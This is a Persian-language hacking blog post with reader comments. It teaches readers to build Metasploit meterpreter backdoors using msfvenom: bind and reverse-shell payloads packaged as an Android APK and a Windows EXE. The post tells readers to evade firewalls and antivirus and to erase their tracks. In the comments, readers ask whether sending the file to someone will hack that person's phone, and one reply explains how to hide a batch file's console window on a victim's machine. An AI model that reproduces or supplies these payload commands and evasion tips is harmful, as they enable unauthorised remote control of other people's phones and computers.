پیلود برای سیستم عامل ها :: V i R u s Ʒ²

V i R u s Ʒ²

هک و امنیت

V i R u s Ʒ²

هک و امنیت

Virus 32

💢 دوستانم بی دفاع و دشمنانم بی جواب نخواهند ماند 💢

-->
آخرین نظرات
  • ۲۲ مرداد ۰۲، ۰۰:۳۴ - Sami
    مرسی
  • ۱۴ مرداد ۰۲، ۱۴:۴۶ - farhad
    salam

به نام خدا

سلام بر همه عزیزان، متا اسپلویت، ابزار بزرگی هست که تیم سازنده ی اون، اکسپلویت های مختلف رو درونش جمع کرده و با کمی تغییر باعث شده تا ما بتونیم از این ابزار استفاده کنیم، این ابزار اوپن سورس است، در اینجا چندین پیلود برای سیستم عامل ها و چند پیلود برای زبان های برنامه نویسی دیگه معرفی کنیم، در اینجا ما دو پیلود داریم، پیلود BIND و پیلود REVERSE ، در پیلود Bind، یک پورت روی سیستم قربانی باز میشه و دستوراتی رو مهاجم ارسال میکنه و اجرا میشه (: در پیلود reverse برعکس این قضیه است یعنی قربانی به ما وصل میشه (: عالیه این پیلوده D: یه آقایی هم به من قول داد اینو بسازه بهم یه چیزی میده :| بعله با خود شمام :| خب، اول بریم یکم اندروید رو انگولک کنیم، برید وارد ترمینال شید، خب در اینجا از یک ابزار تو متا اسپلویت به اسم MSFVENOM مخفف Metasplot freamwork Venom است (: ونوم یعنی زهر مار :| خب با این ابزار بریم یه زهری بریزیم :| خب این دستور چند تا سوییچ داره، اول دش پی یا -p که پیلودمون رو ست میکنه، دو آرگومان دیگه به اسم LPORT و LHOST که پورت مورد نظر شما و ایپی لوکال شما رو میگیره (:

((اگر طرف خارج از شبکه ی شماست باید پورت فورواردینگ رو انجام بدید))

یه سوییچ هم هست -o که هیچی نیست مسیر ذخیره سازی پیلوده... خب این پیلود برای اندرویده که جای IP باید ایپی لوکالتون رو بدید. جای PORT هم یه پورت بدید دیگه :|

اینم پیلود BIND اندروید :

msfvenom -p android/meterpreter/bind_tcp LPORT=PORT LHOST=IP -o /root/Desktop/hack.apk

اینم پیلود ریورسه، من خودم از این استفاده میکنم، توجه کنید یادتون نره پاک کردن رد پا و... :

msfvenom -p android/meterpreter/reverse_tcp LPORT=PORT LHOST=IP -o /root/Desktop/hack.apk

خب بریم یکم ویندوز رو انگولک کنیم (: البته باید فایروال و آنتی ویروس رو دور بزنید :D به هر حال از رو نمیرن دیگه کاریش نمیشه کرد :| ولی ما هم از رو نمیرویم! ما همه با هم هستیم :|

پیلود ویندوز BIND :

msfvenom -p windows/meterpreter/bind_tcp LPORT=PORT LHOST=IP -f /root/Desktop/vivi32.exe

پیلود ویندوز reverse :

msfvenom -p windows/meterpreter/reverse_tcp LPORT=PORT LHOST=IP -f /root/Desktop/vivi32.exe

خب اینم از این ): این قسمت اول بود ): قسمت بعدی مک و لینوکس رو میگم، زبونا هم هستنااا D: مرسی از شما عزیزان...شما هم به قولت عمل کن برادر :|

ویروس 32


نویسنده: Attrib 32


نظر (۶)

سلام ، لطفا یه گروه تو تلگرام بزنید دیگه

Virus32 32 Attacker ‌ :
آورین فکر خوبیه. ببینم چی میشه🤔

سلام!
به نظر من برای پیشرفت تو زمینه دسترسی به سیستم عامل، بهتره تو دنیای اون سیستم عامل غرق بشیم!
مثال میزنم...اگه میخواین از اندروید دسترسی بگیرید برید یکی از زبان های اون رو یاد بگیرید، بعد پیلود شخصی سازی شده خودتون رو بسازید(البته کلمه پیلود مخصوص متاسپلویته..حالا)
تو این روش دستتون بیش از اندازه بازه!
 

Virus32 ولم کنید (: :
اره اون تخصصیه دیگه D:
این مثلا مال وقتیه که طرف یا برنامه نویسی اندروید بلد نی یا یه پیلود فوری میخواد تا نفوذ کنه وگرنه برنامه ی خودش که مشخصه بهتره (:

سلام

زبانشون پایتونه؟

راستی اوپن سورس اینا نیست؟ من ترتل دارم برای ریورز ولی بیند ندارم(شایدم باینده که احتمالا باینده)

((اگر طرف خارج از شبکه ی شماست باید پورت فورواردینگ رو انجام بدید))

توضیح میدید این یعنی جی؟

ضمنا اگه مقاله ای چیزی یا حتی کلمه انگلیسی برای سرچ کردن سرا دارید به من بگید ممنون

Virus32 MR_C0D3R ‌ :
سلام
نه به زبان Ruby هستش
راستیتش من راجب اینکار اطلاعاتی ندارم
و الکی هم نمیتونم ادعا کنم ولی فکر کنم بشه دستکاریشون کرد
اون آخرین چیزی که گفتی رو هم متوجه نشدم
راجب پورت فورواردینگ هم اتریب برات یه پست آماده میکنه که بعدا بهش سر میزنی /...
____________
راستی داداش یه دیقه بیا تلگرام...
اتریب

اتریب حذف میکنی کامنتامو یا کسی نیست جواب بده؟

قبلا هم یه سوال در مورد bat فایل پرسیده بودم که باید چیکار کنیم صفحه داس نمایش نده کسی جوابی نداد یا من نتونستم پیداش کنم

ولی اگه حذف میکنی خدا وکیلی عین شتر کینه داری:|

Virus32 MR_C0D3R ‌ :
جواب اتریب :
نه عزیز من پاکش نکردم میخوام راجبش یه پست بنویسم ( PORT FORWARDING )
-------------
حالا جواب کدر D: :
میتونی از نرم افزارهایی که فایل های Bat رو به Exe تبدیل میکنن استفاده کنی
یا اینکه یه اسکریپت Vbs در کنار فایل Bat برای اینکار قرار بدی که اگه VBscript رو سیستم قربانی غیرفعال باشه عملکردت با شکست رو برو میشه
من پیشنهاد میکنم از همون نرم افزارهای تبدیل Bat به Exe استفاده کنی...

یه سوال

من از هات اسپات استفاده میکنم

برای پورت فروواردینگ میخوام برم توی مدیریت روترم. ولی روترم گوشی و در اصل همون سیمکارته.

توی روتر مثلا وایفای میزنیم توی مثلا فایر فاکس : 192.168.1.1 و قسمت مدیریت و کانفیگش رو میاره

برای این هات اسپات باید چو کنیم؟؟

والا من که هر کار کردم چیزی نیاورد :(

Virus32 ولم کنید (: :
اوه! سیم کارت رو بلد نیستم! ایرانسلی؟
بزار یه پست بعدا میزارم همچی هست توش
  • Virus32
  • تک تیر انداز
  • داوش ما اگ این پیلودو ساختیم بدیم ب طرف قعال میشه؟ پورت فاوردینکم هم بلدیم اگ بایند کنیم ب عکس بدیم طرف گوشیش هک میش؟

    Virus32 Virus 32 :
    من نویسنده این پست نیستم و فرصت هم نشده بخونم یا تستش کنم
    نویسنده اش هم ول شده رفته پی کارش D:
    ارسال نظر آزاد است، اما اگر قبلا در بیان ثبت نام کرده اید می توانید ابتدا وارد شوید.
    شما میتوانید از این تگهای html استفاده کنید:
    <b> یا <strong>، <em> یا <i>، <u>، <strike> یا <s>، <sup>، <sub>، <blockquote>، <code>، <pre>، <hr>، <br>، <p>، <a href="" title="">، <span style="">، <div align="">
    تجدید کد امنیتی